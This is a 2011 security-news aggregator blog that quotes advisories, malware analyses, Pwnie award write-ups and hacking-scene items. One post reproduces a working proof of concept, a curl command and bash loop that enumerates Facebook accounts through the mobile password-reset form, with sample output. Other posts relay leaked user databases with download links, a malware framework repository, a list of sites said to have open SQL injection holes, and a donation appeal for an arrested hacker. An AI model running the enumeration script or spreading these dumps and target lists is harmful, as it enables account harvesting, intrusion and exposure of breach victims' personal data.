::eSploit::

wikileaks indian blackmoney List

2011-08-06T19:02:00.000+05:30

"WikiLeaks and Indian black money: The following is a FAKE image and never appeared on WikiLeaks."

wish it were a real leak :( waiting for the day when the list will be out.

HTran and APT

2011-08-04T22:00:00.001+05:30

HTran and the Advanced Persistent Threat | Dell SecureWorks: "While researching one of the malware families involved in the RSA breach disclosed in March 2011, Dell SecureWorks CTU observed an interesting pattern in the network traffic of a related sample (MD5:53ba6845f57f8e9ef600ef166be3be14). When the sample under analysis attempted to connect to the C2 server at my.amazingrm.com (203.92.45.2), the server returned a succinct plain-text error message instead of the expected HTTP-formatted response:"

http://www.secureworks.com/research/threats/htran/

http://read.pudn.com/downloads199/sourcecode/windows/935255/htran.cpp__.htm

Internet Underground 2011

2011-08-04T21:41:00.001+05:30

"This paper aims to give an overall up-to-update review, evaluation and analysis of the underground scene of black hat hackers and/or cyber criminals."

Paper Download:
www.exploit-db.com/download_pdf/17334/

Pwnie winners

2011-08-04T21:36:00.000+05:30

Pwnie for Best Server-Side Bug

Awarded to the person who discovered or exploited the most technically sophisticated and interesting server-side bug. This includes any software that is accessible remotely without using user interaction.

ASP.NET Framework Padding Oracle (CVE-2010-3332)

Credit: Juliano Rizzo, Thai Duong

Juliano and Thai showed that the ASP.NET framework is vulnerable to a padding oracle attack that can be used to remotely compromise almost any ASP.NET web application, often leading to remote code execution on the server.

Pwnie for Best Client-Side Bug

Awarded to the person who discovered or exploited the most technically sophisticated and interesting client-side bug. These days, ‘client’ is pretty much synonymous with ‘web browser’, but don't forget about all the media player integer overflows!

FreeType vulnerability in iOS (CVE-2011-0226)

Credit: Comex

Comex exploited a vulnerability in the interpreter for Type 1 font programs in the FreeType library used by MobileSafari. This exploit is a great example of programming a weird machine to exploit a modern system. Comex used his control over the interpreter to construct a highly sophisticated ROP payload at runtime and bypass the ASLR protection in iOS. Furthermore, the ROP payload exploited a kernel vulnerability to execute code in the kernel and disable code-signing. The exploit was hosted onjailbreakme.com and was successfully used by thousands of people to jailbreak their iOS devices.

Pwnie for Best Privilege Escalation Bug

Awarded to the person who discovered or exploited the most technically sophisticated and interesting privilege escalation vulnerability. As more defense-in-depth systems like Mandatory Access Control and Virtualization are deployed, privilege escalation vulnerabilities are becoming more important. These vulnerabilities can include local operating system privilege escalations, operating system sandbox escapes, and virtual machine guest breakout vulnerabilities.

Windows kernel win32k user-mode callback vulnerabilities (MS11-034)

Credit: Tarjei Mandt

In the span of a few months, Tarjei found more than 40 vulnerabilities in the Windows kernel. In hispresentation at Infiltrate 2011, he described the details of these vulnerabilities and his kernel exploitation techniques.

Pwnie for Most Innovative Research

Awarded to the person who published the most interesting and innovative research in the form of a paper, presentation, tool or even a mailing list post.

Securing the Kernel via Static Binary Rewriting and Program Shepherding

Author: Piotr Bania

To implement some of the ideas from pax-future.txt is one thing, to implement them through static analysis on Windows, rewriting drivers automagically, and have it all work preserving binary compatibility across a wide range of Windows versions: that's deserving of respect.

Pwnie for Lifetime Achievement

Most hackers have the personality of a supermodel who does discrete mathematics for fun. Like mathematicians, hackers get off on solving very obscure and difficult to even explain problems. Like models, hackers wear a lot of black, think they are more famous than they are, and their career effectively ends at age 30. Either way, upon entering one's fourth decade, it is time to put down the disassembler and consider a relaxing job in management. This award is to honor the previous achievements of those who have moved on to bigger and better things.

pipacs/PaX Team

The person that we are honoring this year with the lifetime achievement award has, surprisingly, contributed a lot to the defensive side of security. The winner has repeatedly innovated behind the scenes, avoided the conference circus and maintained a high level of personal and intellectual integrity.

His technical work has had an outsize impact on security: His ideas are fundamental to security improvements in all major operating systems in recent years, and his ideas have indirectly shaped most modern memory-corruption attack techniques. No attacker can be taken seriously nowadays that does not deal with defensive inventions pioneered by our winner.

In an environment where Microsoft awards 200k USD for mitigation ideas that they can then patent and monopolize, he has freely shared his ideas - out of intellectual openness, but also out of a rather endearing mixture of humility and incredulity at the general retardedness of others.

Aside from all this, his innovations had a major impact when they were first introduced: For quite a while after their introduction, his work made it difficult to hack other hackers, taking away the hackers favourite pasttime -- infighting -- and making sure that innocent third parties were hacked.

The winner of this years lifetime achievement award is pipacs/PaX Team, for creating PaX, giving birth to ASLR, impacting all modern operating systems, and, last but not least, for patching an mp3 player and a tetris clone into softIce.

http://pwnies.com/winners/

Analysis of ngrBot

2011-08-04T21:35:00.001+05:30

Analysis of ngrBot - Stop Malvertising: "Today we will have a closer look at ngrBot, an IRC bot with rootkit capabilities. The core of ngrBot is an advanced ring3 (usermode) system-wide injection and hooking engine similar to ZeuS and SpyEye."

http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html

Deobfuscate exploit kits using Malzilla

2011-08-04T18:34:00.001+05:30

Deobfuscate exploit kits using Malzilla: "I'll give you some examples how you can use Malzilla for deobfuscation of exploit packs.

My preferred method is using templates for various exploit kits.

Part 1 - Best Pack exploit kit

Create a new file in Malzilla's subdirectory 'templates' and name the file 'BestPack'.
Insert the following lines."

http://www.malwaredomainlist.com/forums/index.php?topic=4636.msg21853#msg21853

open sale hacked data Sqli !

2011-08-04T00:35:00.000+05:30

I stumbled upon this site (selling the below services ) in January this year, it was in the news then and many (including me )blogged, tweeted about it.

Thought it'll go down in a day or so. However, today after nearly 7 months saw the same news in imperva blog, checked the site and found that it's not only still up and running but even updating frequently !

Apart from selling the services above, this guy also discloses SQL injection vulnerabilities in major websites including banks, universities, large corporations and Government organizations like :

https://www.playstation.ru/

http://www.playstation.ca/
http://www.hartford.edu/
http://armani.com/
http://www.parliament.gov.bw/
http://www.nbc.org.kh/

http://www.bot-tz.org/

http://www.na.gov.pk/

http://www.presidentofpakistan.gov.pk/

http://www.cbp.gov/

http://www.ad.gov.ir/

http://www.tacp.toshiba.com/

http://labs.oracle.com/

The worst part is many of the disclosed SQLi vulnerabilities in the above sites may be still open and can be misused by someone. Recently, SONY had a bad time with series of hacks . It looks like the playstation vulnerabilities are updated recently (Yesterday August 2) so may be still live !

This guy also provides his contact information clearly:

Whois & Domain Info:

Some Additional Related snapshots and Links:

http://webcache.googleusercontent.com/search?q=cache:0NFyFEui4FcJ:www.hackforums.net/showthread.php%3Ftid%3D1289466+http://www.hackforums.net/showthread.php%3Ftid%3D1289466&cd=1&hl=en&ct=clnk&gl=in&source=www.google.co.in

http://www.youtube.com/watch?v=Ad62bfptGpQ

Now, the question is why|how the site is still up ? Good question...I don't know aswell :)

The Site:

http://www.srblche.com/

eSploit Post (Jan):

http://esploit.blogspot.com/2011/01/professional-hacker-website-hacking.html

Imperva posts: (Recent & Jan)

http://blog.imperva.com/2011/08/in-hollywood-sequels-are-tremendously-profitable-now-matter-how-bad-in-fact-in-2009-mathmaticians-even-came-up-with-a-f.html

http://krebsonsecurity.com/2011/01/ready-for-cyberwar/
http://blog.imperva.com/2011/01/major-websites-govmiledu-are-hacked-and-up-for-sale.html

non-alpha encoder online

2011-08-03T23:10:00.001+05:30

http://hackvertor.co.uk/hvurl/2p
http://www.thespanner.co.uk/2011/08/03/decoding-non-alphanumeric-code-with-hackvertor/

hodprod malware analysis

2011-08-03T23:08:00.000+05:30

http://www.eset.com/us/resources/white-papers/Hodprot-Report.pdf

Operation Shady RAT !

2011-08-03T22:56:00.000+05:30

"Operation Shady RAT - Biggest Cyber Attacks in history uncovered . McAfee publish a new report that it says is one of the most comprehensive analysis ever revealed of victim profiles from a five-year long targeted operation by a specific actor dubbed Operation Shady RAT."Paper:
http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf
http://www.zdnet.com/blog/btl/operation-shady-rat-five-things-to-know/53928

China Blue Army !

2011-08-03T22:47:00.000+05:30

"China has recently announced the existence of the Blue Army, a government sponsored cyber warfare unit similar to those launched by theU.S, the United Kingdom, Australia and Israel."

http://www.zdnet.com/blog/security/chinas-blue-army-when-nations-harness-hacktivists-for-information-warfare/8686

Google Chrome 13.0.782.107 Update !

2011-08-03T22:45:00.000+05:30

"The Google Chrome team is pleased to announce the arrival of Chrome 13.0.782.107 to the Stable Channel for Windows, Mac, Linux, and Chrome Frame. Spanning 5200+ revisions, Chrome 13 contains some exciting new features like Instant Pages prerendering technology. To find out about other new features, check out the Official Chrome Blog. "

FIXES:

[75821] Medium CVE-2011-2358: Always confirm an extension install via a browser dialog. Credit to Sergey Glazunov.
[$1000 each] [78841] High CVE-2011-2359: Stale pointer due to bad line box tracking in rendering. Credit to miaubiz and Martin Barbella.
[79266] Low CVE-2011-2360: Potential bypass of dangerous file prompt. Credit to kuzzcc.
[79426] Low CVE-2011-2361: Improve designation of strings in the basic auth dialog. Credit to kuzzcc.
[Linux only] [81307] Medium CVE-2011-2782: File permissions error with drag and drop. Credit to Evan Martin of the Chromium development community.
[83273] Medium CVE-2011-2783: Always confirm a developer mode NPAPI extension install via a browser dialog. Credit to Sergey Glazunov.
[83841] Low CVE-2011-2784: Local file path disclosure via GL program log. Credit to kuzzcc.
[84402] Low CVE-2011-2785: Sanitize the homepage URL in extensions. Credit to kuzzcc.
[84600] Low CVE-2011-2786: Make sure the speech input bubble is always on-screen. Credit to Olli Pettay of Mozilla.
[84805] Medium CVE-2011-2787: Browser crash due to GPU lock re-entrancy issue. Credit to kuzzcc.
[85559] Low CVE-2011-2788: Buffer overflow in inspector serialization. Credit to Mikołaj Małecki.
[$500 each] [85808] Medium CVE-2011-2789: Use after free in Pepper plug-in instantiation. Credit to Mario Gomes and kuzzcc.
[$1000] [86502] High CVE-2011-2790: Use-after-free with floating styles. Credit to miaubiz.
[$1000] [86900] High CVE-2011-2791: Out-of-bounds write in ICU. Credit to Yang Dingning from NCNIPC, Graduate University of Chinese Academy of Sciences.
[$1000] [87148] High CVE-2011-2792: Use-after-free with float removal. Credit to miaubiz.
[$1000] [87227] High CVE-2011-2793: Use-after-free in media selectors. Credit to miaubiz.
[$500] [87298] Medium CVE-2011-2794: Out-of-bounds read in text iteration. Credit to miaubiz.
[$500] [87339] Medium CVE-2011-2795: Cross-frame function leak. Credit to Shih Wei-Long.
[87548] High CVE-2011-2796: Use-after-free in Skia. Credit to Google Chrome Security Team (Inferno) and Kostya Serebryany of the Chromium development community.
[$1000] [87729] High CVE-2011-2797: Use-after-free in resource caching. Credit to miaubiz.
[87815] Low CVE-2011-2798: Prevent a couple of internal schemes from being web accessible. Credit to sirdarckcat of the Google Security Team.
[$1000] [87925] High CVE-2011-2799: Use-after-free in HTML range handling. Credit to miaubiz.
[$500] [88337] Medium CVE-2011-2800: Leak of client-side redirect target. Credit to Juho Nurminen.
[$1000] [88591] High CVE-2011-2802: v8 crash with const lookups. Credit to Christian Holler.
[88827] Medium CVE-2011-2803: Out-of-bounds read in Skia paths. Credit to Google Chrome Security Team (Inferno).
[$1000] [88846] High CVE-2011-2801: Use-after-free in frame loader. Credit to miaubiz.
[$1000] [88889] High CVE-2011-2818: Use-after-free in display box rendering. Credit to Martin Barbella.
[$500] [89142] High CVE-2011-2804: PDF crash with nested functions. Credit to Aki Helin of OUSPG.
[$1500] [89520] High CVE-2011-2805: Cross-origin script injection. Credit to Sergey Glazunov.
[$1500] [90222] High CVE-2011-2819: Cross-origin violation in base URI handling. Credit to Sergey Glazunov.

http://googlechromereleases.blogspot.com/2011/08/stable-channel-update.html

WAF and SQL Injection

2011-08-03T22:39:00.001+05:30

WAFs And SQL Injection - Dark Reading: "The ModSecurity site is putting on the SQL Injection Challenge. Contestants are attempting to find successful SQL injection attacks against target applications. The four sample applications are from IBM, Cenzic, HP, and Acunetix, each with a slightly different host configuration and database platform."

http://www.darkreading.com/database-security/blog/231003041/wafs-and-sql-injection.html

Port 3389 terminal services scans

2011-08-03T22:36:00.001+05:30

ISC Diary | Port 3389 / terminal services scans:

"Port 3389 / TCP is used by Microsoft Terminal Services, and has been a continuing target of attacks."

http://isc.sans.edu/diary.html?storyid=11299&rss

thejester vs ANONYMOUSABU lulzsec

2011-08-03T01:17:00.002+05:30

Even Topiary Didn’t Know What He Was Getting Into «: "Privacy is necessary for an open society in the electronic age. Privacy is not secrecy. Privacy is the power to selectively reveal oneself to the world.’

So folks continue to ask me why I am ‘after’ anon/lulzsec….

Well I’d like to address this.

I am not particularly ‘after’ anon (that’s not denying that we have had our run-ins), everyone knows their roots and anyone who can google knows mine.

However… Lulzsec, hmmm different beast. Lulzsec are threatening, and inciting and RECRUITING.

While Anonymous claim to be ‘leaderless’, Lulzsec is obviously not. And Anonymous in their desperation for the world to see them as anything other than what they really are… have allowed themselves to have a ‘leader’.

That ‘leader’ is known as ANONYMOUSABU"

http://th3j35t3r.wordpress.com/2011/08/01/even-topiary-didnt-know-what-he-was-getting-into/
http://www.scribd.com/doc/61211269/Anonymous-LulzSec-Terrorist-Ties

Host4africa Mass Compromise

2011-08-03T01:10:00.001+05:30

Host4africa Mass Compromise | Sucuri: "We are seeing a lot of sites hosted at host4africa.com compromised with Blackhat Spam SEO. Most of them are in the .co.za TLD (at 74.53.0.0/16 and 74.54.0.0/16) and have hidden links to generic drugs (common Pharma Spam)."

http://blog.sucuri.net/2011/08/host4africa-mass-compromise.html

30 China govt sites hacked Hitcher

2011-08-03T01:00:00.000+05:30

Mirror:
http://k0-ka.in/attack/?id=28212
http://k0-ka.in/attack/?id=28211
http://k0-ka.in/attack/?id=28210
http://k0-ka.in/attack/?id=28209
http://k0-ka.in/attack/?id=28211
http://k0-ka.in/attack/?id=28210
http://k0-ka.in/attack/?id=28209
http://k0-ka.in/attack/?id=28208
http://k0-ka.in/attack/?id=28207
http://k0-ka.in/attack/?id=28204
http://k0-ka.in/attack/?id=28203
http://k0-ka.in/attack/?id=28202
http://k0-ka.in/attack/?id=28201
http://k0-ka.in/attack/?id=28200
http://k0-ka.in/attack/?id=28199
http://k0-ka.in/attack/?id=28197
http://k0-ka.in/attack/?id=28196
http://k0-ka.in/attack/?id=28195
http://k0-ka.in/attack/?id=28194
http://k0-ka.in/attack/?id=28222
http://k0-ka.in/attack/?id=28221
http://k0-ka.in/attack/?id=28220
http://k0-ka.in/attack/?id=28219
http://k0-ka.in/attack/?id=28218
http://k0-ka.in/attack/?id=28217
http://k0-ka.in/attack/?id=28216
http://k0-ka.in/attack/?id=28215
http://k0-ka.in/attack/?id=28214
http://k0-ka.in/attack/?id=28213
------------------------------------------------------------------------------------------------------
Note: look at the domain names, not sure if they're really govt. sites (if yes, then no offense) but the domain names look like random dll/exe names of some malware , trojan vundo or sumthing :P.

Original:
http://pastebin.com/XDGRJ6BE

Anonware malware framework download github

2011-08-03T00:37:00.001+05:30

"download complete everything @ http://www.megaupload.com/?d=QKMY6HRW
UPDATE: GITHUB REPO AVAILABLE NOW! https://github.com/opendeveloper/anonware (^)_(^)

TO SET THE RECORD STRAIGHT:
as for allegations that my code is 'amaturish, lazy, etc.' i would like to say that it's completely true :) the code provided here *IS* just a C# compiler (with a little extra) and shouldn't be taken as some kind of super awesome virus released by a group of Anonymous hackers. it's something me, a bad programmer, threw together in a couple hours and decided to paste on pastebin.
oh, and fortherecord, i was a little high, and, retrospectively, the comments were definitely over-optimistic. and when the reporter from the tech herald contacted me, i assumed that he was a developer, and he took interest in the code. i naturally was like, well i guess it is pretty cool...and let my ego get ahead of myself. i would like to formally apologize to fellow Anonymous members for providing such a simple framework
and then acting inapropriately like it was an awesome new idea.

as for encryption/obfuscation
encryption/obfuscation was something i was assuming the devs could add to the framework; i didn't think it would be something i should put in the framework. besides; if i put a specific kind of obfuscation/encryption into the framework as it was, it would be pretty easy for the a/v vendors to just find a flaw in one part of my encryption code and then use that to exploit all future editions of it.
that doesn't allign well with what the 'framework' is, more of like the standard stuff so you can add on your own stuff so that a/v doesn't have one standard thing to go off.

as for existing malware frameworks
once again, alittle high, way to optimistic comments ^^_^^
as for the existing malware frameworks pointed out, all of them are either pay-to-use or really hard to find the source for. i provided AnonWare as a service that's simple to find and easy to modify

for the future:
i will release the FIRST version of AnonWare a couple days after #RefRef is released. hopefully, it will include encryption/obfuscation, a seperate edition for people that want to create rouge AV and other software. i have an idea for using it with #RefRef, and will get everything ready for integration with #RefRef while we wait for the #RefRef team to complete development. i emphasize FIRST because it seems some people misunderstood
the point of AnonWare...it was counterintuitive for the Sophos researcher to provide malware detection for it since what is provided here is nowhere near completed malware. also the tech hareld reporter may have misunderstood, partially by sending the code to the researches. i'm not blaming anyone for this; i acted like it was bigger than it was, and as a result reporters and the public may have been dissapointed when reading thru the code.

finally, please help AnonWare :P if you can do any type of development, i would love it if you could help improve the code, translate the code, etc.

ty. tyvm.

NOW BACK TO THE REST OF THE PASTE!

note - keep in mind that this is nowhere near a completed virus, just sumthing i threw together in a day ^_^
if you would like to use this at all, you're gonna need to add a lot to the code...it's just the absolute simplest parts of malware

https://github.com/opendeveloper/anonware
http://pastebin.com/MFc4SY3S

The Sun Scottish students poll Hacked

2011-08-03T00:31:00.002+05:30

The Sun - Hacked Scottish students poll - Pastebin.com: "The Sun - Scottish students poll
Released by batteye

Full CSV file: http://www.mediafire.com/download.php?77kkuvlm6c92exv"

http://pastebin.com/Ucy6Lj34

Free Tope Antisec Movement

2011-08-03T00:28:00.000+05:30

$$$$$$ /$$$$$$$$$$$$$

| $$$__/ |____ $$$____/

| $$$ | $$$

| $$$$$$ /$$$$$ /$$$$$ /$$$$$ | $$$ /$$$$$$ /$$$$$$ /$$$$$

| $$$__/ | $$$_/ | $$$_/ | $$$_/ | $$$ | $$$ $ | $$$ $ | $$$_/

| $$$ | $$$ | $$$$$ | $$$$$ | $$$ | $$$ $ | $$$ $ | $$$$$

| $$$ | $$$ | $$$_/ | $$$_/ | $$$ | $$$ $ | $$$ $ | $$$_/

| $$$ | $$$ | $$$$$ | $$$$$ | $$$ | $$$$$$ | $$$$$$ | $$$$$

|___/ |___/ |_____/ |_____/ |___/ |______/ | $$$__/ |_____/

| $$$

|___/

"To my dearest Lulz Lizards,

Jake Davis is perhaps the greatest digital graffiti artist of all time. A purveyor of many lulz, this swank garden hedge known as Topiary left his personal Twitter account with a quotation from famed civil rights activist Medgar Evers, "You cannot arrest an idea."

Jake wrote many lulzy press releases for both Anonymous and Lulz Security. He proved his value as a spokesperson by taking on Shirley Phelps of Westboro Baptist, slaying her hateful religious zeal with over 9,000 sins.

------

"Under a government which imprisons any unjustly, the true place for a just man is also a prison." ~ Henry David Thoreau"

You can help Topiary by donating bitcoins to whichever following address you trust most:

18NHixaoQekQJ3y52aBGJJwgBWX9X3myYR ~ Sabu

18zJouAQAMzX5sJygZ4M2QV7yb8FzxSbdq ~ Chronicle.SU

------

http://pastebin.com/NzsxhNXT

http://pastebin.com/yXmajXmv

Stuxnet memory analysis Volatility 2.0

2011-08-03T00:18:00.001+05:30

MNIN Security Blog: Stuxnet's Footprint in Memory with Volatility 2.0: "Stuxnet modifies an infected system in such ways that are perfect for showing off many of the new capabilities in Volatility 2.0. We won't cover all of Volatility's commands (for example you won't see idt, gdt, ssdt), because Stunet doesn't mess with those areas of the system, but you'll get a good summary. Second, although many people understand technical malware descriptions, not many people have the 'glue' knowledge to translate artifacts that they read about into Volatility commands. Sometimes you can capably determine if a system is infected by hunting for the artifacts eluded to in reports."

http://mnin.blogspot.com/2011/06/examining-stuxnets-footprint-in-memory.html

Practical C++ Decompilation REcon 2011

2011-08-03T00:11:00.000+05:30

Recon 2011: Practical C++ Decompilation | Hex Blog: "C++ decompilation and how to handle it in IDA and Hex-Rays decompile"

Slides:

http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf

Washington University Students Staff emails Dumped

2011-08-02T23:28:00.001+05:30

Full Disclosure: Washington University Student and Staff Dump: "Washington University Student and Staff Dump"

http://www.washington.edu/home/peopledir/

http://pastebin.com/ALYtW4hA

CVE-2011-2357 Android Browser Cross Application Scripting !

2011-08-02T23:18:00.000+05:30

"A 3rd party application may exploit Android's Browser URL loading process in
order to inject JavaScript code into an arbitrary domain thus break Android's
sandboxing. There are two vectors that can achieve this:
1. The malicious application causes the Android's browser to reach the MAX_TAB
limit. From then on URLs are loaded under the current tab. The attacking
application can open MAX_TAB URLs by calling startActivity times
with the attacked domain. On the th call, the attacking app can
insert a javascript:// URI, which will be opened in the context of the
attacked domain. It should be denoted that the sent Intent should be
combined with the FLAG_ACTIVITY_BROUGHT_TO_FRONT flag because it is likely
that the Browser will have UI focus from the second intent and forward, in
which case Android won't attach this flag automatically and the crucial code
fragment under onNewIntent will not be executed.
2. Sending two consecutive startActivity calls. The first call includes the
attacked domain, and causes Android's browser to load it. The second call
contains the javascript code. If the time interval between the two intents
is small enough, then it is likely that the browser will have UI focus when
the second startActivity call is made, therefore the input intent won't have
the FLAG_ACTIVITY_BROUGHT_TO_FRONT flag and, as explained in the previous
vector, the JavaScript URI will be opened under the current tab, i.e. the
attacked domain."

http://blog.watchfire.com/files/advisory-android-browser.pdf
http://seclists.org/fulldisclosure/2011/Aug/9

Return Oriented Programming paper !

2011-08-02T23:00:00.000+05:30

Review: Buffer overflow, format string

• Return Oriented Programming

– Chain together sequences (‘gadgets’) ending in RET

– Can use good code chunks as ‘alphabet’, string

together to get for bad code

• Some similarities to an antigram (form of anagram)

Within earshot ‡ I won't hear this

– Build “gadgets” for load‐store, arithmetic,

logic, control flow, system calls

– Attack can perform arbitrary computation

using no injected code at all

http://cs.uno.edu/~dbilar/11CSCI6621-NetworkSecurity/04.07.11.ROP.CSCI6621/04.06.11.ReturnOrientedProgramming.CSCI6621.pdf

Internet explorer users low IQ ?

2011-08-02T22:58:00.000+05:30

Freakonomics » What Does Your Web Browser Say About Your I.Q.? (Hint: I.E. Users Won’t Like the Answer): "A study by AptiQuant Psychometric Consulting finds that people who use Internet Explorer as their web browser are, on average, less smart than those who use other browers. As PC Mag reports:"

http://www.freakonomics.com/2011/08/02/what-does-your-web-browser-say-about-your-i-q-hint-i-e-users-wont-like-the-answer/

http://www.pcmag.com/article2/0,2817,2389463,00.asp

SSH Brute Force attacks

2011-08-02T22:56:00.001+05:30

ISC Diary | SSH Brute Force attacks: "A little while ago I asked for some SSH logs and as per usual people responded with gusto. So first of all thanks to all of those that provided logs, it was very much appreciated. Looking through the data it does look like everything is pretty much the same as usual. Get a userid, guess with password1, password2, password3, etc. "

http://isc.sans.edu/diary.html?storyid=11296&rss

New hacking tools by Anonymous

2011-08-02T22:55:00.001+05:30

AnonOps Communications: New hacking tools by Anonymous (a New Cannon): "Anonymous is developing a new DDoS tool. So far, what they have is something that is platform neutral, leveraging JavaScript and vulnerabilities within SQL to create a devastating impact on the targeted website. But will the tool last, and will it make law enforcement’s job harder in the long run?
Previously, Low Orbit Ion Canon (LOIC) was the go to weapon for Anonymous supporters during protests against dictators in North Africa, and Operation: Payback. However, LOIC is also the reason scores of people have been arrested in the last year, so many feel its time is at an end.
The new tool, called #RefRef, is set to be released in September, according to an Anon promoting it on IRC this afternoon. Developed with JavaScript, the tool is said to use the target site’s own processing power against itself."

http://anonops.blogspot.com/2011/08/new-hacking-tools-by-anonymous-new.html

1see[dot]ir/j/ mass injection alert Best Pack exploit kit!

2011-08-02T22:53:00.000+05:30

Mass compromise: New injection url is 1see[dot]ir/j/. Currently leading to a Best Pack exploit kit
Query:

http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/

http://www.malwaredomainlist.com/mdl.php?search=2011/08/02_13:54&colsearch=All&quantity=50

How to hack Ligatt security video !

2011-08-02T22:46:00.000+05:30

WordPress timthumb.php zero day remote shell !

2011-08-02T22:43:00.002+05:30

Zero Day Vulnerability in many Wordpress Themes | mm: "The Exec summary: An image resizing utility called timthumb.php is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised."

http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
https://code.google.com/p/timthumb/issues/detail?id=212

Cisco Discovery Protocol Metasploit !

2011-08-02T22:40:00.001+05:30

Cisco Discovery Protocol Metasploit Framework Module: "SecureState is releasing another module for the Metasploit Framework, this time for forging Cisco Discovery Protocol frames. The Cisco Discovery Protocol has had a history of vulnerabilities in various IOS products. It is used in Cisco environments for devices to advertise information to other Cisco devices such as versions and capabilities. Exploiting this protocol has usually resulted in denial of service conditions and required using various programs from less than reputable sources. One notable exception to this, however, is Yersinia. However, the Metasploit Framework has been distributed with the Racket library provided by Jon Hart, which provides an interface for forging raw CDP frames. SecureState is releasing a module that allows users to take advantage of this functionality. The module allows users to set the various parameters of a CDP frame and then transmit it as often as they'd like. This is useful in situations where a user needs to imitate a Cisco device such as a VoIP phone."

Download:

http://www.securestate.com/Documents/cdp.rb

http://blog.securestate.com/post/2011/07/11/Cisco-Discovery-Protocol-Metasploit-Framework-Module.aspx

facebook password recovery security !

2011-08-02T22:38:00.000+05:30

Facebook doesn't ensures the user information may
not be collected by any bot or any automated process. Even though you
can protect from this kind of attacks using captchas or tokens security
into the forms.

Step by step:

- - Go to http://m.facebook.com

- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.

Using cURL:

curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat $1);
do
        s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
        if [ $? -eq 0 ]; then
                echo "$mail No tiene cuenta.";
        else
                echo "$mail Si tiene cuenta.";
        fi
done

#+----- EOF ------+


You can ennumerate users by using a list of email address or phone numbers.

$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO




Into the full version of facebook http://www.facebook.com this option is
protected by a captcha to verify that we are human, in the mobile,
version this validation doesn't exists.

http://seclists.org/fulldisclosure/2011/Aug/12

Web Application Scanners Comparison !

2011-08-02T18:06:00.002+05:30

Commercial Web Application Scanner Benchmark

A Comparison of 60 Commercial & Open Source Black Box Web Application Vulnerability ScannersThe Scanning Legion:
Web Application Scanners Accuracy Assessment & Feature Comparison Commercial & Open Source Scanners

1. Prologue
2. List of Tested Web Application Scanners
3. Benchmark Overview & Assessment Criteria
4. Test I – The More The Merrier – Counting Audit Features
5. Test II – To the Victor Go the Spoils – SQL Injection
6. Test III – I Fight (For) the Users – Reflected XSS
7. Test IV – Knowledge is Power - Feature Comparison
8. What Changed?
9. Initial Conclusions – Open Source vs. Commercial
10. Morale Issues in Commercial Product Benchmarks
11. Verifying The Benchmark Results
12. Notifications and Clarifications
13. List of Tested Scanners
14. Source, License and Technical Details of Tested Scanners
15. Comparison of Active Vulnerability Detection Features
16. Comparison of Complementary Scanning Features
17. Comparison of Usability and Coverage Features
18. Comparison of Connection and Authentication Features
19. Comparison of Advanced Features
20. Detailed Results: Reflected XSS Detection Accuracy
21. Detailed Results: SQL Injection Detection Accuracy
22. Drilldown – Error Based SQL Injection Detection
23. Drilldown – Blind & Time Based SQL Injection Detection
24. Technical Benchmark Conclusions – Vendors & Users
25. So What Now?
26. Recommended Reading List: Scanner Benchmarks
27. Thank-You Note
28. Frequently Asked Questions
29. Appendix A – Assessing Web Application Scanners
30. Appendix B – A List of Tools Not Included In the Test
31. Appendix C – WAVSEP Scan Logs
32. Appendix D – Scanners with Abnormal Behavior

http://sectooladdict.blogspot.com/2011/08/commercial-web-application-scanner.html

Exploit kits attack vector

2011-08-02T18:02:00.001+05:30

Exploit kits attack vector – mid-year update - Securelist: "In order to get some perspective, lets start by analyzing the situation in 2010. The most common exploit kits last year were:

Phoenix
Eleonore
Neosploit
YESExploitKit
SEOSploitPack"

http://www.securelist.com/en/analysis/204792184/Exploit_kits_attack_vector_mid_year_update

Anatomy of a Unix breach

2011-08-02T18:01:00.001+05:30

ISC Diary | Anatomy of a Unix breach: "ISC reader Will wrote in to share a bash_history file (thanks!) from one of his Unix servers that got hacked. Since knowing the command sequence used by the bad guys helps to detect similar intrusions, we are sharing it here in (almost) full length. Some of the sites hosting the used root shell exploits are still live, and hence not included. The whole breach of Will's server started via a password guessing attack against SSH. We have covered this risk repeatedly in ISC diaries. Once the bad guys were in, they ran the commands below, and then apparently used the just installed IRC bots to continue scanning for SSH ports on other systems."

http://isc.sans.edu/diary.html?storyid=11290&rss

English Football Club Hacked !

2011-08-02T00:36:00.001+05:30

English Football Club Hacked! - Pastebin.com: "Following is the Data base of English Football Club (http://www.englishfootball.com).

By
ThEhAcKeR12

@ThEhAcKeR12
ThEhAcKeR12.blogspot.com

P.S. 1)The passwords are in Hash Encryption.
2)Do the changes to the account ASAP cause they had detected the Intrusion, they might block the Login."

http://pastebin.com/5GErPw3M

indivbe.com hacked db leaked !

2011-08-02T00:34:00.001+05:30

Here we go, one of our releases (Indivibe Part 1). This data base is of Indivibe (www.indivbe.com) one the most famous social websites in India. This is just a glitch (only 12000+) we have to give but there will be more to come. Many Internationl DJ's & Indian stars have there account, do give them a call ;)

Enjoy the Mayhem!
by
ThEhAcKeR12

@ThEhAcKeR12
ThEhAcKeR12.blogspot.com

P.S.- Passwords are in Hash encryption.
To download entier document click- http://www.4shared.com/file/EXxeoie5/indivibe_data_base.html

http://pastebin.com/BDQznvYY
http://pastebin.com/Hc0Wuf6J
http://pastebin.com/vSbyFuEc

The Cable Co. hacked db leaked !

2011-08-02T00:30:00.003+05:30

